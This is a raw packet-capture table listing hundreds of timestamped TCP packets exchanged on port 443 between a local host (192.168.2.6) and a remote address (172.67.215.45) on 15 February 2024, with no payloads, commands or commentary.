Feb 15, 2024 19:42:26.770200968 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.770221949 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.771636963 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.771682978 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.771707058 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.771713018 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.771739006 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.771758080 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.790509939 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.790563107 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.790647984 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.790679932 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.790694952 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.790715933 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.791007042 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.791049004 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.791062117 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.791074991 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.791100979 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.791119099 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.792684078 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.792728901 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.792758942 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.792768955 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.792792082 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.792810917 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.793950081 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.793994904 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.794043064 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.794055939 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.794085026 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.794102907 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.794898033 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.794943094 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.794979095 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.794985056 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.795011997 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.795031071 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.796139956 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.796181917 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.796216011 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.796222925 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.796252012 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.796266079 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.796983004 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.797916889 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.797966003 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.797992945 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.798000097 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.798023939 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.798051119 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.798841000 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.798882961 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.798912048 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.798918009 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.798938036 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.798959017 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.799787998 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.799835920 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.799850941 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.799859047 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.799890995 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.799906015 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.800801992 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.800844908 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.800873995 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.800880909 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.800924063 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.800924063 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.802360058 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.802403927 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.802419901 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.802428961 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.802443027 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.802464962 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.803617954 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.803663015 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.803683996 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.803692102 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.803705931 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.803725958 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.804472923 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.804516077 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.804536104 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.804557085 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.804584026 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.804593086 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.805458069 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.805497885 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.805522919 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.805530071 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.805556059 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.805572987 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.807148933 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.807190895 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.807209969 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.807216883 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.807228088 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.807255030 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.808064938 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.808109045 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.808131933 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.808139086 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.808165073 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.808182955 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.809263945 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.809307098 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.809329033 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.809335947 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.809360027 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.809374094 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.810722113 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.810765982 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.810800076 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.810806036 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.810823917 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.810844898 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.811743975 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.811789036 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.811813116 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.811819077 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.811830044 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.811851978 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.812875032 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.812917948 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.812943935 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.812952995 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.812972069 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.812987089 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.814022064 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.814064026 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.814089060 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.814095020 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.814109087 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.814127922 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.815345049 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.815392971 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.815409899 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.815416098 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.815428019 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.815448999 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.816571951 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.816618919 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.816633940 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.816647053 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.816658020 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.816677094 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.817538977 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.817580938 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.817603111 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.817617893 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.817637920 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.817650080 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.818525076 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.818568945 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.818593979 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.818600893 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.818613052 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.818639994 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.820127964 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.820172071 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.820199966 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.820208073 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.820229053 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.820242882 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.821664095 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.821707964 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.821723938 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.821732044 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.821754932 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.821773052 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.822670937 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.822715044 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.822736025 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.822752953 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.822782040 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.822803020 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.823893070 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.823935986 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.823959112 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.823965073 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.823982000 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.823998928 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.824980021 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.825021982 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.825047970 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.825054884 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.825071096 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.825087070 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.826153994 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.826199055 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.826220989 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.826229095 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.826251030 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.826263905 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.827785969 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.827826977 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.827847004 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.827861071 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.827873945 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.827888966 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.828839064 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.828859091 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.828892946 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.828907013 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.828919888 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.828941107 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.829755068 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.829777002 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.829817057 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.829832077 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.829843044 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.829864979 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.830573082 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.830594063 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.830632925 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.830641031 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.830656052 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.830672026 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.832148075 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.832170010 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.832204103 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.832211018 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.832230091 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.832248926 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.833142042 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.833163977 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.833203077 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.833209991 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.833220005 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.833241940 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.834094048 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.834120035 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.834147930 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.834158897 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.834168911 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.834184885 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.835136890 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.835155964 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.835199118 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.835213900 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.835227013 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.835247040 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.836256027 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.836278915 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.836318970 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.836328983 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.836338997 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.836364031 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.837807894 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.837829113 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.837861061 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.837867975 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.837898016 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.837907076 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.839026928 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.839046955 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.839086056 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.839093924 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.839112043 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.839128017 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.840668917 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.840689898 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.840738058 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.840754032 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.840764999 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.840789080 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.842524052 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.842545033 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.842606068 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.842616081 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.842649937 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.843872070 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.843902111 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.843943119 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.843950987 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.843969107 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.843986988 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.845628023 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.845649958 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.845712900 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.845722914 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.845758915 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.846735001 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.846755028 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.846796036 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.846803904 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.846813917 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.846837997 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.848402023 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.848422050 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.848474026 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.848488092 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.848501921 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.848525047 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.849534988 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.849555969 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.849601030 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.849608898 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.849617958 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.849643946 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.850281954 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.850303888 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.850344896 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.850353956 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.850368977 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.850383043 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.850858927 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.850878954 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.850929022 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.850938082 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.850974083 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.851353884 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.851373911 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.851408958 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.851418972 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.851429939 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.851449966 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.851878881 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.851900101 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.851943016 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.851950884 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.851963043 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.851980925 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.852339983 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.852361917 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.852389097 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.852401972 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.852415085 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.852432013 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.852829933 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.852852106 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.852884054 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.852897882 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.852910042 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.852931023 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.853406906 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.853430033 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.853465080 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.853476048 CET	443	49722	172.67.215.45	192.168.2.6
